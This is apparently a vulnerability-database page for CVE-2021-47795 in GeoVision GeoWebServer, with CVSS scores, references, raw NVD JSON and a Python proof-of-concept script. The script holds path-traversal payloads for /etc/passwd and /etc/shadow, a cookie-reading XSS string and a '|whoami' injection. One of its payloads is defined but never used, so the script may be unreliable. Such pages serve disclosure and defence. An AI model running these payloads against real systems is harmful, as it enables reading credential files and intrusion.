CVE-2021-47795

Description

GeoVision GeoWebServer 5.3.3 contains multiple vulnerabilities including local file inclusion, cross-site scripting, and remote code execution through improper input sanitization. Attackers can exploit the WebStrings.srf endpoint by manipulating path traversal and injection parameters to access system files and execute malicious scripts.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GeoVision GeoWebServer 5.3.3及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2021-47795 PoC - GeoVision GeoWebServer Local File Inclusion
# Target: GeoVision GeoWebServer 5.3.3
# Endpoint: WebStrings.srf

target = "http://target.com"

# LFI payload - Read system files
lfi_payloads = [
    "/WebStrings.srf?path=../../../../../../etc/passwd",
    "/WebStrings.srf?path=../../../../windows/win.ini",
    "/WebStrings.srf?file=../../../../../../etc/shadow"
]

# XSS payload
xss_payload = "/WebStrings.srf?input=<script>alert(document.cookie)</script>"

# RCE via log injection
rce_payload = "/WebStrings.srf?cmd=|whoami"

def test_lfi():
    """Test Local File Inclusion vulnerability"""
    for payload in lfi_payloads:
        url = target + payload
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                print(f"[+] LFI Successful: {payload}")
                print(f"Content: {response.text[:500]}")
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")

def test_xss():
    """Test Cross-Site Scripting vulnerability"""
    url = target + xss_payload
    try:
        response = requests.get(url, timeout=10)
        if xss_payload in response.text:
            print(f"[+] XSS vulnerability confirmed")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    print("[*] Testing CVE-2021-47795")
    test_lfi()
    test_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47795
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47795
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47795/
[4] VulDB https://vuldb.com/cve/CVE-2021-47795
[5] https://www.exploit-db.com/exploits/50211
[6] https://www.geovision.com.tw/cyber_security.php
[7] https://www.vulncheck.com/advisories/geovision-geowebserver-local-file-inclusion

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47795", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:23.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "GeoVision GeoWebServer 5.3.3 contains multiple vulnerabilities including local file inclusion, cross-site scripting, and remote code execution through improper input sanitization. Attackers can exploit the WebStrings.srf endpoint by manipulating path traversal and injection parameters to access system files and execute malicious scripts."}, {"lang": "es", "value": "GeoVision GeoWebServer 5.3.3 contiene múltiples vulnerabilidades, incluyendo inclusión local de ficheros, cross-site scripting y ejecución remota de código debido a una sanitización de entrada inadecuada. Los atacantes pueden explotar el endpoint WebStrings.srf manipulando parámetros de salto de ruta y de inyección para acceder a ficheros del sistema y ejecutar scripts maliciosos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50211", "source": "[email protected]"}, {"url": "https://www.geovision.com.tw/cyber_security.php", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/geovision-geowebserver-local-file-inclusion", "source": "[email protected]"}]}}